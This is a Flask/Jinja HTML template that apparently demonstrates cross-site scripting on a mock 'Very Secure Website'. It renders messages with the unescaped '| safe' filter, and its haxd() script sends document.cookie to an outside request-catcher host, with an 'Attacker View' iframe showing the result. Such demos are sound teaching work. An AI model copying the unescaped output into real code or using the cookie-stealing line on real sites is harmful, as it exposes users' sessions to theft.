<!DOCTYPE html>
<html lang="en">
<head>
    <title>xxs_demo</title>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/bulma/0.6.2/css/bulma.min.css">
</head>

<body>
<script>
    function haxd() { 
        document.getElementById("hack-me").style.display = "block";
        var url = "https://haq.requestcatcher.com/?token=" + document.cookie;
        var win = window.open(url, '_blank');
        win.focus();
    }
</script>
<div class="columns is-mobile is-centered">
	<div class="column is-half">
		<!-- <p class="bd-notification is-primary"> -->
			<div class="block">
				<h1 class="title is-1">Very Secure Website</h1>
				<div class="columns">
					<div class="column">
						<div class="box">
							<h1 class="title is-1">Hello {{ username }},</h1>    
							<h1 class="subtitle">Current Cookie: {{ cookie_value }}</h1><br>
							<h1 class="title is-6">
									<ul>
									{% for msg in msgs %}
											<li> {{ msg | safe }} </li>
									{% endfor %}
									</ul>
							</h1>
							<form method="POST" name="form" action="{{ url_for('post_msg') }}">
								<div class="field">
									<label class="label">Update your secret messages!</label>
									<p class="control">
											<textarea class="textarea" name="msg" placeholder="message"></textarea>
									</p>
								</div>
								<button type="submit" name="submit" class="button is-success is-medium is-centered">Submit</button>
							</form>
							<button class="button is-fullwidth is-medium is-danger" id="hack-me" onclick="haxd()">I want to get hacked</button>
							<div class="notification is-warning">
									<button class="delete"></button>
									You just clicked a link to <strong>"https://haq.requestcatcher.com/?token=" + document.cookie</strong>
							</div>
						</div>
					</div>
					<div class="column">
						<div class="box">
							<h1 class="title is-1">Attacker View</h1>   
							<iframe src="https://haq.requestcatcher.com" frameborder="0"></iframe>
					</div>
				</div>
			</div>
		<!-- </p> -->
	</div>
</div>

</body>
</html>
